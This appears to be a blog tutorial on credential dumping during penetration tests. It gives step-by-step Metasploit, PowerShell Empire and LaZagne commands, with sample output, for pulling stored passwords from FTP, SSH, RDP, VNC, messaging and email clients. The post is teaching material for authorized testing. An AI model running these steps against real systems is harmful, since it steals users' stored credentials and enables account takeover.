Credential Dumping Techniques for Penetration Testing: Tip & Techniques

Cyb3rSecCyb3rSec
5 min read

Table of contents

Credential dumping is a critical technique in penetration testing, allowing security professionals to retrieve stored credentials from various applications on a target system. This guide explores multiple methods to extract credentials using tools like PowerShell Empire, Metasploit Framework, LaZagne, and Nirsoft's Mail PassView. Each section includes practical commands and steps, with placeholders for you to add screenshots or images to enhance your blog post. Always ensure you have explicit permission to perform these actions, as unauthorized access is illegal.

1. PowerShell Empire: SessionGopher Module

PowerShell Empire is a powerful post-exploitation framework that includes the SessionGopher module, designed to automatically retrieve credentials from applications like PuTTY, WinSCP, FileZilla, and Microsoft Remote Desktop (RDP). This module simplifies the process by scanning the system and extracting saved credentials without manual intervention.

Steps:

  1. Establish a session in PowerShell Empire.

  2. Load the SessionGopher module:

     usemodule credentials/sessiongopher

  3. Execute the module:

     execute

Example Output:

The module can retrieve credentials such as:

  • FileZilla: Host: 192.168.152.133, User: user, Password: 123, Port: 21, Protocol: FTP

  • PuTTY: Session: user, Host: 192.168.152.133, User: user, Port: 22

  • WinSCP: Session: user, Host: 192.168.152.133, User: user, Password: 123

  • RDP: Host: 192.168.152.129, User: user

2. CoreFTP: Metasploit Framework

CoreFTP is a Windows-based FTP client used for file transfers over the FTP protocol. Metasploit provides a post-exploitation module to extract credentials stored in the Windows registry at HKEY_CURRENT_USER\SOFTWARE\FTPWare\CoreFTP\Sites.

Steps:

  1. Gain a Metasploit session on the target system.

  2. Load the CoreFTP credentials module:

     use post/windows/gather/credentials/coreftp

  3. Set the session ID:

     set session 1

  4. Run the exploit:

     exploit

Example Output:

[*] Looking at Key HKU\S-1-5-21-3798055023-10338230357-2023829303-1001
[*] Host: 192.168.152.133 Port: 21 User: User Password: 123
[*] Post module execution completed

3. FTP Navigator: LaZagne

FTP Navigator is an FTP client that facilitates file transfers, edits, and directory synchronization. The LaZagne tool can extract credentials stored by FTP Navigator.

Steps:

  1. Download and run LaZagne on the target system:

     lazagne.exe all

  2. Look for the FTP Navigator section in the output to retrieve credentials.

4. FTP Navigator: Metasploit Framework

Metasploit also offers a module to dump FTP Navigator credentials, making it a versatile option for penetration testers.

Steps:

  1. Load the FTP Navigator credentials module:

     use post/windows/gather/credentials/ftpnavigator

  2. Set the session ID:

     set session 1

  3. Execute the module:

     exploit

.

5. FileZilla: Metasploit Framework

FileZilla is a popular open-source FTP client compatible with Windows, Linux, and macOS. Metasploit can extract credentials stored in FileZilla's configuration files, typically located at C:\Users\User\AppData\Roaming\FileZilla.

Steps:

  1. Load the FileZilla credentials module:

     use post/multi/gather/filezilla_client_cred

  2. Set the session ID:

     set session 1

  3. Run the exploit:

     exploit

Example Output:

[*] Checking for FileZilla directory in: C:\Users\User\AppData\Roaming
[*] Found C:\Users\User\AppData\Roaming\FileZilla
[*] Reading and parsing configuration files

6. Pidgin: Metasploit Framework

Pidgin is a multi-protocol instant messaging client that stores credentials in C:\Users\User\AppData\Roaming\.purple\accounts.xml. Metasploit can extract these credentials for protocols like AIM, Jabber, IRC, and ICQ.

Steps:

  1. Load the Pidgin credentials module:

     use post/multi/gather/pidgin_cred

  2. Set the session ID:

     set session 1

  3. Execute the module:

     exploit

Example Output:

[*] Checking for Pidgin profile in C:\Users\User\AppData\Roaming
[*] Found C:\Users\User\AppData\Roaming\.purple
[*] Reading accounts.xml file
[*] Collected the following credentials:
[*] Server: slogin.oscar.aol.com:5190 Protocol: prpl-aim Username: user123 Password: pass123
[*] Server: unknown2:5222 Protocol: prpl-jabber Username: fnfjkfdssnf@gmail.com Password: pass123

7. PSI: LaZagne

PSI is a customizable instant messaging client that operates over the XMPP network and supports file transfers. LaZagne can extract PSI credentials efficiently.

Steps:

  1. Run LaZagne to dump all credentials:

     lazagne.exe all

  2. Check the output for PSI credentials.

8. VNC: Metasploit Framework

VNC (Virtual Network Computing) is a remote access tool that stores passwords in the system. Metasploit can retrieve these credentials.

Steps:

  1. Load the VNC credentials module:

     use post/windows/gather/credentials/vnc

  2. Set the session ID:

     set session 2

  3. Execute the module:

     exploit

9. WinSCP: LaZagne

WinSCP is an FTP client based on the SSH protocol, featuring a graphical interface and remote editing capabilities. LaZagne can extract its credentials.

Steps:

  1. Run LaZagne to dump credentials:

     lazagne.exe all

  2. Look for WinSCP credentials in the output.

10. WinSCP: Metasploit Framework

Metasploit also provides a module to extract WinSCP credentials.

Steps:

  1. Load the WinSCP credentials module:

     use post/windows/gather/credentials/winscp

  2. Set the session ID:

     set session 1

  3. Execute the module:

     exploit

11. Email Credentials: Mail PassView

Mail PassView, developed by Nirsoft, is a tool designed for internal penetration testing to retrieve email credentials stored on a system.

Steps:

  1. Download Mail PassView from the official Nirsoft website.

  2. Launch the tool to display stored email credentials.

Conclusion

Credential dumping is a powerful technique for penetration testers to uncover stored credentials in various applications. Tools like PowerShell Empire, Metasploit, LaZagne, and Mail PassView streamline the process, targeting applications such as CoreFTP, FileZilla, WinSCP, PuTTY, Pidgin, PSI, VNC, and email clients. By following the steps outlined above, you can efficiently extract credentials during authorized testing. Always ensure you have permission to perform these actions to stay within legal and ethical boundaries.

For further learning, explore resources like Hacking Articles or join training programs in ethical hacking, network pentesting, or bug bounties to enhance your skills.

0
Subscribe to my newsletter

Read articles from Cyb3rSec directly inside your inbox. Subscribe to the newsletter, and don't miss out.

LinuxWindowsredteamingcredential access

Written by

Cyb3rSec
Cyb3rSec

if you dont ask me , I won't tell you